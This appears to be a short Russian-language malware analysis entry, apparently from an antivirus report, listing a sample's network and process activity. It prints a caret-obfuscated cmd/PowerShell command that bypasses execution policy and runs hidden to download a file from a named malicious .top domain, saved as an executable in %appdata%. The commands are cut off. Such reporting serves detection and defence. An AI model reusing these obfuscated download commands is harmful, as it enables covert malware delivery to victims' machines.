Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoW^ErsH^El^l.^ex^e^ -Executi^o^n^PoliCY^ BYp^AS^S^ ^-^no^PrOf^ile ^-^wi^NDo^W^STy^Le^ H^iddEN (^NE^w-^oB^jEcT ^s^Y^STE^m.^N^eT.^we^Bc^Lie^nt).DOwNLoaDfi^le^('http://zofelaseo....
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "PoW^ErsH^El^l.^ex^e^ -Executi^o^n^PoliCY^ BYp^AS^S^ ^-^no^PrOf^ile ^-^wi^NDo^W^STy^Le^ H^iddEN (^NE^w-^oB^jEcT ^s^Y^STE^m.^N^eT.^we^Bc^Lie^nt).DOwNLoaDfi^le^('http://zofelaseo....' (со скрытым окном)